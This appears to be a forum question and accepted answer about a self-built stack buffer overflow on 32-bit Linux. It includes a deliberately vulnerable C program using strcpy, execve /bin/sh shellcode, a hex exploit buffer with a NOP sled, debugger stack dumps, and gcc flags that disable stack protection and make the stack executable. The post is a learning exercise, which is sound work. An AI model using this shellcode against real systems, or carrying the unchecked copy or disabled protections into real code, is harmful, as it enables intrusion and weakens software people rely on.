# Issues testing buffer overflow

Tags: linux, shellcode, gcc

I am experimenting on my computer, so I wrote a vulnerable program in C to test buffer overflows on:

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int check_password(char *password){
    int retval = 0;
    char possible_password_1[16] = "possiblepasswrd";
    char possible_password_2[16] = "drwssapelbissop";
    char user_input_password[16];

    strcpy(user_input_password, password);

    if(!strcmp(possible_password_1, user_input_password))
        retval = 1;

    if(!strcmp(possible_password_2, user_input_password))
        retval = 2;

    return retval;
}

int main(int argc, char *argv[]){
    if(argc < 2){
        printf("Not enough arguments\n");
        return -1;
    }

    int correct = check_password(argv[1]);
    if(correct)
        printf("CORRECT PASSWORD\n");
    else
        printf("INCORRECT PASSWORD\n");

    return 0;
}
```

Not very well written but it's full of vulnerabilities.

I managed to overwrite retval to get the program to display "CORRECT PASSWORD" even though my password is incorrect. However, I would now like to test some shellcode: `\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80`

I cannot, however, get it to execute. I just get a segfault.

Here is the stack in the check_password function right before the call to strcpy:

```
0xbffff30c: 0x00000000  0xb7fff000  0xb7fff918  0xbffff330
0xbffff31c: 0x73777264  0x65706173  0x7369626c  0x00706f73
0xbffff32c: 0x73736f70  0x656c6269  0x73736170  0x00647277
0xbffff33c: 0x00000000  0x00008000  0xb7fb1000  0xbffff378
0xbffff34c: 0x08048523  0xbffff5c3  0x00000003  0xb7e30740
```

Among other things, I see `0x08048523`, which seems to be the return pointer, as it points to the instruction right after the call to check_password in main:

```
0x0804851e <+59>:   call   0x804844b <check_password>
0x08048523 <+64>:   add    esp,0x10
```

I therefore decided to build my exploit buffer around this:

```
00000000: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000010: 90 90 90 90 90 90 90 90 90 31 c0 50 68 2f 2f 73  .........1.Ph//s
00000020: 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80  hh/bin..PS......
00000030: c4 f5 ff bf c4 f5 ff bf c4 f5 ff bf c4 f5 ff bf  ................
00000040: c4 f5 ff bf                                      ....
```

`0xbffff5c4` is the address of `*argv[1]`, and contains the shellcode:

```
0xbffff5c4: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbffff5cc: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbffff5d4: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbffff5dc: 0x31    0xc0    0x50    0x68    0x2f    0x2f    0x73    0x68
0xbffff5e4: 0x68    0x2f    0x62    0x69    0x6e    0x89    0xe3    0x50
```

When the overwrite occurs, the address to the next instruction in main is overwritten by this address:

Before:

```
0xbffff30c: 0x00000000  0xb7fff000  0xb7fff918  0xbffff330
0xbffff31c: 0x73777264  0x65706173  0x7369626c  0x00706f73
0xbffff32c: 0x73736f70  0x656c6269  0x73736170  0x00647277
0xbffff33c: 0x00000000  0x00008000  0xb7fb1000  0xbffff378
0xbffff34c: 0x08048523  0xbffff5c3  0x00000003  0xb7e30740
```

After:

```
0xbffff30c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff31c: 0x90909090  0x90909090  0x50c03190  0x732f2f68
0xbffff32c: 0x622f6868  0xe3896e69  0xe1895350  0x80cd0bb0
0xbffff33c: 0xbffff5c4  0xbffff5c4  0xbffff5c4  0xbffff5c4
0xbffff34c: 0xbffff5c4  0xbffff500  0x00000003  0xb7e30740
```

So as far as I can tell, the shellcode should execute as soon as the function returns. However, this is not the case:

```
Program received signal SIGSEGV, Segmentation fault.
0xbffff5c4 in ?? ()
```

I'm really not sure what I did wrong here. Could someone please point me in the right direction?

Thank you.

Answer (score 1, accepted):

I suppose you need to compile the code disabling the stack protections. For example, try in this way:

gcc -g -fno-stack-protector -zexecstack  -o vuln vuln.c

-g (enable debugging information)

-f no-stack-protector (disable extra code to check buffer overflow)

-z execstack (make the stack executable... where your shellcode will be)